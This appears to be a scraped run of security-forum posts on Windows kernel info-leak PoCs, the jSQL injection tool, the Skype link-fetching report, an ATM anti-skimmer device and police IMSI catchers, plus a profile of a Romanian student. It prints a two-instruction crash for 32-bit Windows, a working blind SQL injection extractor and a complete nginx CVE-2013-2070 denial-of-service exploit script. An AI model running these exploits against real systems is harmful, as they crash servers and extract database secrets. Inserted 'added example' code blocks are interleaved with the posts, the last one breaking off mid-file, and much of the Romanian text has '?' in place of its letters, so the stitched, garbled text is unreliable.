“SegSs, LDT_ENTRY.HighWord.Bits.Default_Big and IRETD” – due to how the “Big“ LDT entry flag in the SS: segment descriptor is handled by the IRETD instruction used for cross-privilege-level transfers in Windows, it is possible to have the CPU disclose the upper 16 bits of the current thread’s kernel stack pointer in 32-bit versions of Windows.

Proof of Concept source code: small_seg.zip (1kB, ZIP).

Example output:

    Z:\>smallseg.exe
    [+] High word of kernel stack address: 94070000

    Z:\>smallseg.exe
    [+] High word of kernel stack address: 94010000

    Z:\>smallseg.exe
    [+] High word of kernel stack address: 956b0000

“Windows 32-bit Trap Handlers” – the lack of proper sanitization of the previous CPL inside several trap handlers used in 32-bit Windows can be leveraged to disclose addresses of several internal ntoskrnl.exe (or equivalent) symbols in the kernel address space, effectively defeating kernel ASLR (not that it matters much for this particular OS).

Proof of Concept source code: kitrap01.zip (1.3kB, ZIP) and kitrap0e_addr.zip (1.4kB, ZIP).

Example outputs:

    Z:\>kitrap01.exe
    [+] Kernel image base: 8320c000, size: 413000
    [+] Iteration 3d000 / 413000
    [+] nt!KiFastCallEntry address: 83249790

    Z:\>kitrap0e.exe
    [+] Kernel image base: 8320c000, size: 413000
    [+] Iteration 3d000 / 413000
    [+] Leaked address: 8324984c
    [+] Leaked address: 83249887
    [+] Iteration 41000 / 413000
    [+] Leaked address: 8324d4ed
    [+] Iteration 412000 / 413000

“Crashing Windows and leaking bits” – the primary focus area of the overall talk. As it turns out, the nt!KiTrap0e #PF trap handler trusts the KTRAP_FRAME.Ebp field to be a valid kernel-mode pointer when processing faults occurring at specific, magic Eip values.
Again, due to lack of proper KTRAP_FRAME.SegCs sanitization, it is possible to craft a frame with a controlled Eip and the user-mode Ebp register, allowing a local attacker to crash the system via an invalid memory reference, or otherwise disclose the least significant bit of any byte in the kernel address space. The two instructions capable of crashing all 32-bit Windows NT-family systems as of today are as follows:

    xor ebp, ebp
    jmp 0x8327d1b7

where 0x8327d1b7 is the nt!KiSystemServiceAccessTeb address.

Proof of Concept source code: kitrap0e_bsod.zip (0.5kB, ZIP), kitrap0e_leak_bits.zip (1.4kB, ZIP) and kitrap0e_addr_space.zip (1.5kB, ZIP). The programs unconditionally crash the operating system, allow disclosing specific bits of the kernel memory and scan the kernel address space layout, respectively.

Source: NoSuchCon’13 and crashing Windows with two instructions | j00ru//vx tech blog
  16. Nytro

    New category

    I don't give a fuck about your offers.
  17. Nytro

    New category

    Geniuses: https://rstforums.com/forum/external.php?type=RSS2&forumids=59
  18. Nytro

    New category

    Let's see what comes out of it... Show me: https://rstforums.com/forum/oferte.rst
19. [h=1]jSQL Injection v-0.4 : a java tool for automatic database injection[/h]
May 21, 2013 · by Terry

Update jSQL Injection v-0.4 : a java tool for automatic database injection.

Version 0.4 features:
- GET, POST, header, cookie methods
- Normal, error based, blind, time based algorithms
- Automatic best algorithm selection
- Multi-thread control (start/pause/resume/stop)
- Progression bars
- Shows URL calls
- Simple evasion
- Proxy setting
- Distant file reading
- Webshell deposit
- Terminal for webshell commands
- Configuration backup
- Update checker
- Admin page checker
- Brute forcer (md5 mysql…)
- Coder (encode decode base64 hex md5…)
- Supports MySQL

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

Next work:
+ distant table writing [sqli]
+ distant file writing [sqli]
+ reverse tcp shell deposit [sqli]
+ right elevation [sqli]
+ speed increase (non encoding pass): 50% faster [sqli]
+ control all running tasks in a tab [gui]
# speed test comparison with other injection tools [dev]
# automatic code testing (JUnit) [dev]
# wiki pages [site]

Download: jsql-injection-v0.4.jar (1.2 MB)
Find Other Version | Sources: https://code.google.com/p/jsql-injection/

Our post before: Update jSQL Injection v-0.3 : a java tool for automatic database injection.

Source: Update jSQL Injection v-0.4 : a java tool for automatic database injection.
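The feature list names four inference algorithms (normal, error based, blind, time based) without saying what the blind one does. As an added example for this post, not part of jSQL, the following Python code sets up a constructed in-memory SQLite target behind a string-concatenated query and recovers a column value using nothing but the application's yes/no answer (row found or not), which is the boolean blind technique; the parameterized version of the same lookup sits beside it to make the fix concrete. Table, column and secret values are constructed; "time based" differs only in the channel (a conditional delay instead of a row/no-row answer).

```python
"""Boolean-based blind SQL injection against a constructed SQLite target, next to
the parameterized query that closes it. Added example, not jSQL's code."""
import sqlite3


def build_target():
    """Constructed target: one table with an 'admin' row whose hash we will extract."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users(name, pw_hash) VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
    db.execute("INSERT INTO users(name, pw_hash) VALUES ('bob', '0123456789abcdef0123456789abcdef')")
    return db


def vulnerable_lookup(db, user_id: str) -> bool:
    """Vulnerable pattern: the id is concatenated into the SQL text. The caller only
    learns whether a row came back (think profile page vs. 404). That single bit is
    the whole channel a boolean blind algorithm needs."""
    row = db.execute("SELECT id FROM users WHERE id = " + user_id).fetchone()
    return row is not None


def safe_lookup(db, user_id: str) -> bool:
    """Fixed pattern: type check plus bound parameter; injected text is never parsed as SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = db.execute("SELECT id FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery: str, max_len: int = 64):
    """Recover the scalar result of `subquery` one character at a time. For each
    position a binary search over the code point (0..127) asks the oracle
    'is unicode(substr(result, pos, 1)) > mid?', so exactly 7 requests per character.
    Past the end of the string substr() yields '' and unicode('') is NULL in SQLite,
    so every comparison is false, the search settles on 0 and extraction stops.
    Returns (recovered_string, number_of_oracle_queries)."""
    recovered, queries = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            queries += 1
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered, queries


ADMIN_HASH_QUERY = "SELECT pw_hash FROM users WHERE name='admin'"


def demo():
    """Extract through the vulnerable lookup, then show the fixed lookup rejects the payload."""
    db = build_target()
    secret, n = blind_extract(lambda p: vulnerable_lookup(db, p), ADMIN_HASH_QUERY)
    still_injectable = safe_lookup(db, "1 AND 1=1")   # same shape of payload, parameterized
    return secret, n, still_injectable


if __name__ == "__main__":
    secret, n, still_injectable = demo()
    print(f"recovered {secret!r} in {n} requests; parameterized query injectable: {still_injectable}")
```

The request count is what makes the multi-threading and "automatic best algorithm selection" in the feature list matter: a 32-character value costs 231 round trips here, and a time-based variant multiplies each of them by the chosen delay.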
20. [h=1]The little genius from Hackerville who conquered the USA[/h]

The story of the Romanian who turned down offers from Google.

Everyone knows Ionuț Budișteanu from television, from the newspapers or from the stories about "what else Romanians have invented". In fact, few know him personally, because he spends almost 16 hours a day at the computer, inventing programs for which he has received over a hundred awards. He doesn't go to the park, doesn't go out for a beer with friends, and the last book he read was in second grade. He doesn't regret it, because for him computer science sums up all possible passions.

When I first met Ionuț, all I knew was that he is a genius, at least that's how those who had met him up to that point described him. He doesn't say the same thing; he introduces himself as "a kid who studies a lot". I also knew that he had invented a program with which blind people manage to distinguish objects, that he had been courted by the biggest universities in the US and that he had impressed countless juries with his projects.

From the emails we exchanged before we officially met, I imagined he was a very polite person. And I wasn't wrong. Ionuț uses the formal pronoun, says "Thank you!" as often as he can and talks about his projects modestly, calmly, but sure of himself.

After a conversation in which he explained to me how his inventions work, he pulled a stack of diplomas out of a backpack. About 130. "I also brought some diplomas from the competitions I took part in," he tells me calmly. The first one I noticed was one awarded by Yale University. A few others followed from Taiwan, Azerbaijan, the Netherlands, and the list goes on. He told me he had taken part in competitions abroad 13 times and in many others at home. He is only 18, and the competition adventure began in fifth grade. The passion for the computer and everything that can be done with it, much earlier. Ionuț saw his first computer at age 3. His parents had lent
someone a sum of money, which that person was unable to pay back. Instead, he gave them a Pentium 386. "There was only one other computer in the whole town at the time," he jokes. Although in Râmnicu-Vâlcea, the town where he still lives, there weren't many such machines on which to learn how they are used, that didn't stop him from figuring out on his own how they work. He started experimenting with games of all kinds. He remembers that at 4 he knew how to save his game by himself, recognized the words and commands that helped him do it, and wouldn't let go of the new toy.

More than 1,000 games followed, which he bought off the Internet, until he realized he had to move on to the next level. He had gotten bored, and now he wanted to invent the games, not play them. So, in third grade, he tried to make his own games, learning from the instructions of the ones he knew, from application documentation and from specialist books. Although none of these documents were in Romanian, he says casually that "I understood what I was reading; after all, I had the operating system in English."

He was interested in 3D animation, and at the time The Lord of the Rings was all the rage in that department. He too tried to create similar things and managed to produce explosions and characters, but couldn't animate them. For a short while he thought that maybe what he was trying to do wasn't for him. He kept experimenting with applications, trying to learn how they work.

Meanwhile, his schoolmates were learning to use Microsoft Word and Excel, and the computer science teacher asked him to type up her documents, because he typed fast. He also showed her what he was working on by himself, but she didn't believe him. Things weren't very simple from fifth grade on either. He was learning a new programming language, based mainly on translating recreational math problems into code, which interested him less than 3D effects, animation or other applications.
To hold his attention, the teacher promised to help him finish the game he was working on if he also did what was in the school curriculum. He agreed, but that didn't stop him from continuing his programming work at home. Every now and then he would bring his teacher a CD with what he had been working on. "She was puzzled how I was making the applications when I didn't actually know the basic instructions. She didn't really believe me when she saw what I was doing," he says, laughing.

In middle school, Ionuț had turned into the modern, high-tech version of the fairy-tale characters who grow in one year as much as others do in ten. He absorbed information faster than his classmates and churned out programs. He started going to the national computer science competitions, where he applied what he learned at school, but he didn't abandon his passions either. He studied at home, alone, from academic computer science papers, treatises and other things of no interest to kids his age. He hadn't gone out to play in front of the apartment block since he was nine. He didn't feel the need; computing filled his time the way he liked. "Sometimes I'd fall asleep with my head on the keyboard and wake up the next morning."

"Didn't your parents scold you for spending too much time at the computer?" I ask him. "They didn't. They realized I wasn't playing anymore, but using the time productively. The computer is a tool for making money or for developing yourself."

At school he had begun to stand out from his classmates. He always tried to bring his laptop or specialist books into the classroom so as not to lose a moment of study. "Ionuț caught my attention because he was the only one in the class absorbed in computer science books during breaks," recounts his math teacher, Irinel Dafincescu. She met him when he was in seventh grade. He was preparing for the national olympiads and asked his teacher for help with a few things he didn't understand in math. Since then, Irinel Dafincescu has become an important teacher for Ionuț.
She encouraged him at every competition he took part in. "After he came back loaded with international prizes of overwhelming importance, nothing changed in the way he is; there was no trace of arrogance in his behavior and he kept working with the same perseverance," the math teacher recalls.

In ninth grade he moved up a level with the projects he works on: he went to the US for the first time. In veni, vidi, vici style, he won first prize right away from the Association for Computing Machinery (ACM), the largest scientific and academic association in the field of computing. ACM awards the Turing Award, the computing version of the Nobel, and at its gala Ionuț took one of the 12 prizes awarded that year. He was the youngest of the 12, the only one who did not yet have an academic research career.

Meanwhile he got used to being the youngest at the competitions he entered, especially in ninth or tenth grade, when everyone else was in twelfth. That didn't stop him from winning prizes almost every time. "Competitions like these have over 1,000 participants," he explains to me, "and there is respect among us, because we all know how hard we've worked." Respect is, as he let me understand, very important to Ionuț. "It doesn't matter how old you are, it matters who you are," he told me once, when I tried to persuade him to address me informally, since I am not many years older than him.

The success of his first trip to the States brought him an invitation from the University of San Francisco to become their student right then, although he was only in ninth grade. Ionuț did not agree. "I was too young, I would have been too far from my parents," he tells me, smiling. He thinks he shouldn't have skipped stages and that school was useful to him. Although he deals exclusively with computer science and has no time left for other subjects, he tells me that school showed him how to learn. And, as
was to be expected, the internet is a good friend for learning too, so he is a persistent self-learner, using online courses in biology, physics or other areas of interest. If at first he used master's-level courses, now he studies complicated doctoral theses on his own.

After the American prizes and experiences he became a member of ACM and IEEE, the largest professional associations in the world. He has been awarded by Intel repeatedly and was invited by Google Switzerland to work for them when he was in eleventh grade, but he turned them down. "I don't want to be one of 7,000 programmers all working the same way." He believes it is more useful to humanity if ten programmers joined forces to work on innovative research. He wants to become a university professor, and alternative offers don't attract him. He realizes that his enthusiasm and potential would be lost in bureaucratic work or in places where marketing matters more than research in computer science or artificial intelligence.

The best known and most awarded of his projects was the program that helps blind people distinguish objects. Inspired by his uncle, who had lost his sight many years earlier, he wanted to create a cheap device that would be of use to people with this condition. Before that he had gained experience in artificial intelligence, working on an encephalograph and reading countless studies on the internet. He quickly realized that the organ that can send signals to the brain in a way similar to the eyes is the tongue. So he created a multifunctional piece of software and a device that is placed on the tongue, through which, in practice, the blind person recognizes different objects. Ionuț tested the invention on his uncle for several weeks. With a video camera he captured various simple objects. The device processes the information and sends it to a sensor matrix placed on the tongue, and this matrix generates
un nivel de electricitate direct propor?ional cu intensitatea imaginii. Prin exerci?iu, creierul se obi?nuie?te ?i începe s? recunoasc? diferite obiecte. Dup? încerc?ri repetate, unchiul lui reu?ea s? disting? chiar ?i o mare parte dintre literele alfabetului. Înainte de acest proiect, Ionu? mai inventase un program prin care s? fie recunoscute fe?ele ho?ilor care folosesc cagule în atacurile lor, lucrase la un soft de recunoa?tere a dezastrelor naturale ?i multe alte proiecte – toate premiate în str?in?tate. De unde ideile pentru aceste lucruri? La concursurile la care particip? atât de frecvent se propun diverse teme, prin care ar putea fi ajutat? lumea. Acum lucreaz? la o ma?in? autonom?. „Adic? un autoturism care merge singur?“, întreb eu, încercând s? verific informa?ia pe care o credeam posibil? numai în filme SF. M? aprob? ?i îmi spune c? va fi a doua ma?in? de acest fel inventat? în lume. Pentru prima au lucrat o mul?ime de cercet?tori de la Stanford. Unul dintre profesorii de acolo a ?inut cursuri despre acest subiect, îns? nu a vândut marele pont, l?sându-i pe cei ca Ionu? s? inoveze. El vrea s? aduc? o îmbun?t??ire acestei ma?ini, realizând-o cu un radar mult mai ieftin decât cel folosit de americani. Acesta din urm? ar fi costat câteva zeci de mii de dolari, pe când al lui ar fi în jur de 2.000. „Vede?i Gauss-ul acesta?“, îmi indic? el, relaxat, cu degetul c?tre ecranul laptopului, unde tocmai îmi ar?ta cum func?ioneaz? mai exact softul ma?inii autonome. Încerc s? în?eleg cum poate o ma?in? s? mearg? singur?, iar r?spunsul pare destul de simplu: aceasta identific? marcajele ?i semnele rutiere, obstacolele ?i curbele ?i reu?e?te s? mearg? f?r? ca noi s? o conducem. Ca s? î?i duc? la bun sfâr?it proiectul, a primit o ma?in? de la Dacia Renault ?i „Funda?ia Dan Voiculescu“. L-am întrebat dac? are permis pentru ea. „Nu am permis, nu m? intereseaz? asta. Eu vreau s? fac o ma?in? care s? mearg? singur?“. 
La un moment dat, câ?iva dintre profesorii s?i au început s? se întrebe dac? nu cumva genialitatea lui poate fi periculoas?. În vremea în care el se preg?tea de inven?ii care s? ajute umanitatea, în Râmnicu-Vâlcea poli?ia aresta 30 de hackeri pentru fraude informatice grave, poveste din cauza c?reia presa american? i-a dat ora?ului numele de Hackerville. A?a c?, atunci când era în clasa a VIII-a, directorului liceului i s-a cerut s? îi interzic? accesul lui Ionu? în laboratorul de informatic?, „c?ci poate vine FBI-ul la ?coal?“, î?i aminte?te el amuzat. „Acela nu este hacking, este phishing. Este altceva“, m? l?mure?te el despre leg?tura dintre FBI ?i suspiciunile profesorilor s?i. Mi-a explicat c? hackingul înseamn?, de fapt, exploatarea vulnerabilit??ilor site-urilor, ceea ce este foarte u?or. În clasa a VI-a, a vrut s? le arate câteva probleme celor care lucrau la un site românesc, îns? ei nu l-au crezut. Ca s? le demonstreze c? a avut dreptate, a modificat câteva lucruri minore. Speria?i, au vrut s? îl dea în judecat?, îns? Ionu? nu avea pe vremea aceea nici buletin, a?a c? l-au l?sat în pace. Atunci a fost ultima dat? când a încercat ceea ce ar putea fi numit „white hat hacking“. Oamenii nu îl prea cred c? nu se ocup? cu acelea?i lucruri ca ?i acei vâlceni care au f?cut ora?ul celebru în str?in?tate. Unii profesori îi repro*?au în liceu c? programele pe care le inventeaz? nu ar fi adev?rate, c? se „autoplagiaz?“ ?i c?, de fapt, ar fi doar un mic hacker. În liceu, cineva le-a trimis profesorilor mail-uri compromi??toare, iar el a fost primul incriminat. Dar Ionu? nu ar avea timp pentru hacking. „Te-a? putea convinge s? cite?ti o poveste?“, îi propun. „Ah, nu, nu“ – râde el. Prefer? filmele, din care vede maximum 20 într-un an. Filmul preferat, care ar putea avea leg?tur? cu marea sa pasiune, este Terminator, pentru c? aduce în discu?ie nout??ile create de tehnologie în viitor. Spune c? nu î?i pierde timpul cu vizion?ri aleatorii de filme, pentru c? 
nu ?sta este hobby-ul lui. Unica sa pasiune este informatica, iar singurii s?i prieteni sunt tot cei care au leg?tur? cu subiectul acesta, în general cunoscu?i la concursurile interna?ionale la care merge. „Vrei s? pleci undeva în vacan?? dup? ce termini ma?ina autonom??”, îl întreb eu. Îmi spune c? îi sunt suficiente zborurile în str?in?tate pentru concursuri, acolo are parte de tot ceea ce î?i dore?te. Ultima oar? când am vorbit cu Ionu? se gr?bea s? ajung? acas?, s? mai înve?e. De?i are o burs? de 40.000 de dolari, pe care o poate folosi la orice universitate din State, prefer? s? studieze oricum, pentru c? îi place. Vrea s? mearg? la Carnegie Mellon, pentru c? simte c? i s-ar potrivi mai bine decât Yale sau Stanford. UPDATE: Pe 17 iunie, Ionu? a câ?tigat marele premiu de 75.000 de Euro International Science and Engineering Fair (ISEF), organizat de compania Intel in Arizona, SUA, pentru dezvoltarea proiectului ma?inii autonome. Foto: Ioana V?c?ra?u, Mihai D?sc?lescu Sursa: Micul geniu din Hackerville care a cucerit SUA
  21. Oh no, RST isn't working for me anymore, it's getting DDoSed from 3 IPs
  22. [cryptography] skype backdoor confirmation
Adam Back adam at cypherspace.org
Thu May 16 15:52:24 EDT 2013

So when I saw this article, "Skype with care – Microsoft is reading everything you write" (The H Security: News and Features), I was disappointed the rumoured skype backdoor is claimed to be real, and that they have evidence. The method by which they confirmed it is kind of odd: not only is skype eavesdropping, but it's doing HEAD requests on SSL sites that have urls pasted in the skype chat!

Now I've worked with a few of the german security outfits before, though not Heise, and they are usually top-notch, so if they say it's confirmed, you generally are advised to believe them. And the date on the article is a couple of days old, but I tried it anyway.

Set up a non-indexed /dev/urandom generated long filename, and saved it as php with a meta-refresh to a known malware site in case that's a trigger, and a passive html with no refresh and no args. Passed a username/password via ?user=foo&password=bar to the php one and sent the links to Ian Grigg, who I saw was online over skype, with strict instructions not to click. To my surprise I see these two entries in the apache SSL log:

65.52.100.214 - - [16/May/2013:13:14:03 -0400] "HEAD /CuArhuk2veg1owOtiTofAryib7CajVisBeb8.html HTTP/1.1" 200 -
65.52.100.214 - - [16/May/2013:14:08:52 -0400] "HEAD /CuArhuk2veg1owOtiTofAyarrUg5blettOlyurc7.php?user=foo&pass=yeahright HTTP/1.1" 200 -

I was using skype on ubuntu, and Ian on the other end was using MAC OSX. It took about 45mins until the hit came so they must be batched. (The gap between the two requests is because I did some work on the web server, as the SSL cert was expired and I didn't want that to prevent it working, nor something more script-like with cgi arguments as in the article.)

Now are they just hoovering up the skype IMs via the new microsoft central server architecture, having back-doored the skype client to no longer have end2end encryption (and feeding them through echelon or whatever), or is this the client that is reading your IMs and sending selected things to the mothership?

btw their HEAD request was completely ineffective per the weak excuse microsoft offered in the article at top: my php contained a meta-refresh, which the HEAD won't see as it's in the html body. (Yes, I confirmed via my own localhost HTTP GET, as web dev environments are automatic in various ways.)

So there is adium4skype which allows you to use OTR with your skype contacts, using skype as the transport. Or one might be more inclined to drop skype in protest.

I think the spooks have been watching "Person of Interest" too much to think such things are cricket. How far does this go? Do people need to worry about microsoft IIS web servers with SSL, exchange servers? You do have to wonder if apple backdoored their IM client, below the OTR, or silent circle, or the OS - I mean how far does this go? Jon Callas said not apple, that wouldn't be cool, and apple aims for coolness for users; maybe he should dig a little more.

It seems to be getting to where you can't trust anything without compiling it from source, and having a good PGP WoT network with developers. A distro binary possibly isn't enough in such an environment.

Adam

Source: [cryptography] skype backdoor confirmation
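The canary-URL test Adam describes can be run against a web server log automatically. The script below is an added example, not part of his post or any tool he mentions: it parses Apache common-format lines and flags any request for a canary token that did not come from the IP of the person the link was privately sent to. All log lines, addresses (RFC 5737 documentation ranges) and tokens are constructed samples.

```python
"""Canary-URL leak detector for Apache access logs (added example).

Share a unique, unindexed URL only inside a private chat, then watch the
HTTPS log for anyone other than the intended recipient fetching it.
All log lines, addresses and tokens below are constructed samples.
"""
import re
from collections import namedtuple

# Apache "common" log format, the shape shown in the post's log excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

Hit = namedtuple("Hit", "ip ts method path shared_with")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_canary_hits(lines, canaries, allowed_ips=()):
    """Flag requests for a canary path from any IP not in allowed_ips.

    canaries maps each random token to a label saying whom it was sent to.
    The recipient's own IP is expected; any other client means the chat
    transport, or something reading it, extracted and fetched the link.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for token, shared_with in canaries.items():
            if token in rec["path"] and rec["ip"] not in allowed_ips:
                hits.append(Hit(rec["ip"], rec["ts"], rec["method"],
                                rec["path"], shared_with))
    return hits


# Constructed sample log: one expected fetch by the recipient, one
# unexpected HEAD from a third party, one unrelated request, one bad line.
CANARIES = {"Xk93pQtv7Lm2": "sent to recipient A over chat"}
RECIPIENT_IPS = ("198.51.100.7",)
SAMPLE_LOG = [
    '198.51.100.7 - - [16/May/2013:13:02:11 -0400] "GET /Xk93pQtv7Lm2.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [16/May/2013:13:14:03 -0400] "HEAD /Xk93pQtv7Lm2.php?user=foo&pass=bar HTTP/1.1" 200 -',
    '203.0.113.5 - - [16/May/2013:13:20:44 -0400] "GET /index.html HTTP/1.1" 200 2048',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in find_canary_hits(SAMPLE_LOG, CANARIES, RECIPIENT_IPS):
        print("%s %s %s from %s (%s)" % (hit.ts, hit.method, hit.path,
                                         hit.ip, hit.shared_with))
```

Because the canary path also carries the dummy query string, a hit shows not just that the link was fetched but that anything pasted after the `?` travelled with it.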
  23. Jailed Romanian hacker repents, invents ATM security scheme
Add-on device blocks card skimmers
By Neil McAllister in San Francisco
Posted in Security, 17th May 2013 20:33 GMT

A Romanian man serving a five-year jail sentence for bank-machine fraud says he's come up with a device that can be attached to any ATM to make the machine invulnerable to card skimmers.

Valentin Boanta was arrested in 2009 and charged with supplying ATM skimmers – devices that can be attached to ATMs to surreptitiously copy the data from unwitting users' cards – to a local organized crime gang. It was during his subsequent trial and sentencing that Boanta saw the light and traded in his black hat for a white one, Reuters reports.

"Crime was like a drug for me. After I was caught, I was happy I escaped from this adrenaline addiction," Boanta told reporters from his jail cell in Vaslui, Romania. "So that the other part, in which I started to develop security solutions, started to emerge."

Boanta's solution, known as the Secure Revolving System (SRS), is an ingenious one that uses mechanical rather than digital security.

ATM skimmers work by installing a second, concealed card reader over the one that's built into the ATM. When an unsuspecting bank customer inserts a card into the slot, the card's magnetic stripe first runs past the read head of the skimmer, allowing it to copy all of the card's data. The transaction then proceeds as normal and the ATM returns the card to the customer, who is none the wiser.

With Boanta's device installed on the ATM, however, that all changes. Customers insert their cards into the slot long side first, so that the magnetic stripe is parallel to the face of the machine. The device then rotates the card 90 degrees into the ATM, where the legitimate card reader scans the magnetic stripe, then rotates it back out again to return it to the customer. That rotation makes it impossible for an add-on skimmer to read the card, because the magnetic stripe never moves in a straight line until it is secure inside the ATM.

While awaiting the outcome of his trial, Valentin pitched his idea to Mircea Tudor and Adrian Bizgar of Bucharest-based technology firm MB Telecom, who helped him to patent his idea and funded development of the SRS device. The design would go on to win the International Press Prize at the 41st International Exhibition of Inventions in Geneva, Switzerland, in April.

Boanta, however, wasn't available to accept the award. He's currently just six months into his sentence and won't see freedom for another four and a half years. Still, his partners at MB Telecom say all credit for the SRS design should go to him.

"He fully deserves such recognition," Tudor told Reuters. "He's taking part in improving Romania's image abroad and he'll surely join our team when released."

MB Telecom is currently finalizing details of the commercial version of the device and expects to bring it to market in the second half of the year.

Source: Jailed Romanian hacker repents, invents ATM security scheme • The Register
  24. Romanian Police bought a portable mobile-phone monitoring system for 2.8 million lei
by Adrian Dumitrache

The Romanian Police will be able to locate, identify and monitor mobile phones on the Vodafone, Orange, Cosmote and RCS&RDS networks through a portable system bought from the German company SYBORG Informationssysteme for 2.8 million lei, according to www.e-licitatie.ro.

"The system uses the method of simulating a real cell of the mobile telephony network. The system is fully mobile even during operation, and can be installed in a vehicle. The antennas used in the system are hidden from view, disguised in a car roof-rack frame," states the tender specification for the purchase of the system.

The tender was launched in December 2012 and awarded three months later to the sole bidder, SYBORG Informationssysteme.

According to the specification, the system's central unit is integrated in a case measuring at most 60x40x30 centimetres and includes directional antennas, a notebook, a network scanner and batteries. The central unit can also be connected to omnidirectional antennas through a network amplifier.

With the central unit, police officers will be able to monitor GSM and UMTS communications by creating virtual cells with parameters similar to those of the real network's cells. The system allows modifying the signal power at which target phones transmit, as well as collecting, recording and storing in a database the IMSI and IMEI codes, together with the time and date of the record.

Through the specification, the Romanian Police also requested training for two employees, a process that will include 40 hours of theoretical and practical courses.

Source: Poliția Română a cumpărat un sistem portabil de monitorizare a telefoanelor mobile de 2,8 milioane de lei - Gandul
  25. nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070)

# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070)
# Google Dork: CVE-2013-2070
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & nginx v1.4.0
# CVE : CVE-2013-2070

# Python 2 script (httplib, print statements).
import httplib
import time
import socket
import sys
import os

# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0


def chunk(data, chunk_size):
    # One chunked-encoding body: the oversized hex size line, the data, then the terminating zero chunk
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked += "0\r\n\r\n"
    return chunked


if sys.platform == 'linux-i386' or sys.platform == 'linux2':
    os.system("clear")
elif sys.platform == 'win32':
    os.system("cls")
else:
    os.system("cls")

print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) [http://www.mertsarica.com]"
print "======================================================================"

if len(sys.argv) < 2:
    print "Usage: python nginx_dos.py [target ip]\n"
    print "Example: python nginx_dos.py 127.0.0.1\n"
    sys.exit(1)
else:
    host = sys.argv[1].lower()

while packet <= 5:
    body = "Mert SARICA"
    # Python 2 hex() on a long ends in 'L'; the slicing below strips "0xf" and that
    # suffix, then re-prefixes "F" to yield a 16-digit chunk size
    chunk_size = hex(dos_packet + 1)[3:]
    chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()
    if debug:
        print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]
    try:
        con = httplib.HTTPConnection(host)
        url = "/mertsarica.php"
        con.putrequest('POST', url)
        con.putheader('User-Agent', "curl/7.30.0")
        con.putheader('Accept', "*/*")
        con.putheader('Transfer-Encoding', 'chunked')
        con.putheader('Content-Type', "application/x-www-form-urlencoded")
        con.endheaders()
        con.send(chunk(body, chunk_size[:len(chunk_size)]))
    except:
        print "Connection error!"
        sys.exit(1)
    try:
        resp = con.getresponse()
        print(resp.status, resp.reason)
    except:
        # No response within the socket timeout: the worker is presumed down
        print " [*] Knock knock, is anybody there ? (" + str(packet) + "/5)"
    packet = packet + 1
    con.close()

print "[+] Done!"

Source: nginx 1.3.9-1.4.0 DoS PoC
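The PoC above relies on a chunk size whose 16 hex digits do not fit a signed 64-bit length. The following is an added example, not code from the PoC or from nginx, showing the defensive side: a chunk-size parser that accumulates hex digits with a bound check on every step, so an oversized value is rejected before any buffer arithmetic sees it. The limits and sample bodies are constructed for illustration.

```python
"""Bounded chunk-size parsing for HTTP chunked transfer encoding (added example).

Checking the bound before each multiply-add means the parsed size can never
exceed max_size, however long the input, instead of wrapping negative the way
a 16-digit value would in a signed 64-bit C length field.
"""

OFF_T_MAX = 2**63 - 1   # what a signed 64-bit length field can hold
HEX_DIGITS = "0123456789abcdefABCDEF"


class ChunkError(ValueError):
    pass


def parse_chunk_size(header, max_size=OFF_T_MAX):
    """Parse the size field of a chunk header ("<hex>[;extension]").

    Returns the size as an int; raises ChunkError for empty, non-hex or
    oversized values.
    """
    field = header.split(";", 1)[0].strip()
    if not field:
        raise ChunkError("empty chunk size")
    size = 0
    for ch in field:
        if ch not in HEX_DIGITS:
            raise ChunkError("non-hex character %r in chunk size" % ch)
        digit = int(ch, 16)
        if size > (max_size - digit) // 16:   # size*16 + digit would exceed max_size
            raise ChunkError("chunk size exceeds limit %d" % max_size)
        size = size * 16 + digit
    return size


def decode_chunked(data, max_chunk=OFF_T_MAX):
    """Decode a complete chunked body (bytes), failing closed on bad sizes."""
    out = bytearray()
    pos = 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise ChunkError("truncated chunk header")
        size = parse_chunk_size(data[pos:end].decode("ascii", "replace"), max_chunk)
        pos = end + 2
        if size == 0:                         # last-chunk; trailers are ignored here
            return bytes(out)
        if len(data) - pos < size + 2:
            raise ChunkError("chunk body shorter than declared size")
        out += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ChunkError("missing chunk terminator")
        pos += 2


# Constructed inputs: a normal body and one shaped like the PoC's request.
NORMAL_BODY = b"b\r\nMert SARICA\r\n0\r\n\r\n"
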